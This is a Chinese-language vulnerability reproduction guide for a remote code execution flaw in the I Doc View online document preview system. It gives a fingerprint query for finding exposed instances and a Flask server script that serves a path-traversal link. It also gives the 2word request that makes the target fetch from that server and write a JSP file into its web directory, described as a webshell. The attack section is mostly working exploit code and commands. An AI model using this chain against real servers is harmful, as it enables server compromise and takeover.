登录 白背景

I Doc View在线文档预览系统2word存在远程代码执行漏洞

一、漏洞简介

I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统,用于在Web环境中展示和预览各种文档类型,如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统远程代码执行漏洞情报。攻击者可利用该漏洞使服务器下载恶意文件,获取服务器控制权限。

二、影响版本

  • I Doc View

三、资产测绘

  • hunterapp.name="I Doc View"
  • 特征

image.png

四、漏洞复现

  1. 将下列脚本放到vps服务器上安装flsk

main.py

from flask import Flask

app = Flask(__name__)

@app.route('/index.html')
def step1():
    return '''<link href="/..\\..\\..\\docview\\1.jsp">'''

@app.route('/..\\..\\..\\docview\\1.jsp')
def step2():
    return '''<% 
    out.print("123");
    %>'''

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8088)
pip3 install flask

image.png

  1. 运行该脚本,将在8088端口上启用一个web服务器
python3 main.py

image.png

  1. 通过poc远程下载webshell,url为上一步地址
/html/2word?url=http://xx.xx.xx.xx/index.html

image.png

  1. 下载文件地址
/1.jsp

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/glg6ed7epyc6gg0l